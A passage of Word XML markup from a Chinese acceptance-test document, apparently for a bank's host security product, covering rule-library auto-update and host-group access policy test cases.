              <w:t>规则库的自动更新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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>支持连通厂商网络，实现自动更新规则库；在未联网的状态下，支持服务端离线更新规则库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lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>厂商准备高低两个版本的规则库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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:widowControl/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="59"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>进入服务端，打开相应的规则更新模块</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="59"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>上传高版本的规则库</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="59"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>30分钟后在服务端查看oracle-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>01的规则库版本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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>racle-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>01在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>30分钟之内可以自动同步最新的规则库，规则库的版本更新为厂商准备的高版本的规则库号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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc31087"/>
      <w:bookmarkStart w:id="127" w:name="_Toc1122306452"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>主机组的安全访问策略与规则设置</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="92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8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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>主机组的安全访问策略与规则设置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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>支持创建策略集，并创建策略集应用的范围（业务组）和策略规则</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>支持设置业务组内的访问策略规则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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>能够根据实际业务，用位置、环境和应用三个标签创建工作组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>—位置：北京</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境：测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>UASS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>—位置：北京</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境：测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>SSMC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01加入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02加入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01角色为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02角色为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>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lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
